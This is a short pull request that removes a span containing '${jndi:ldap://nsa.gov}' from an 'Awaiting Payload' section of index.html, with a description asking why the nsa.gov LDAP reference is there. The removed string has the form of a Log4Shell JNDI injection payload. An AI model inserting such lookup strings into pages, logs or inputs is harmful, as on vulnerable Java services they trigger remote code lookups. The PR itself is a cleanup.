### PR TITLE
Remove reference to nsa.gov’s ldap from index.html

### DIFF
--- a/index.html
+++ b/index.html
@@ -76,8 +76,6 @@
     <div id="loader" class="loader"></div>
     <div id="awaiting" class="info" style="display:none;">
         Awaiting Payload...
-        <br />
-        <span class="j">${jndi:ldap://nsa.gov}</span>
     </div>
 
     <div id="allset" class="info" style="display:none;">


### PR DESCRIPTION
Why does this include a link to nsa.gov’s ldap?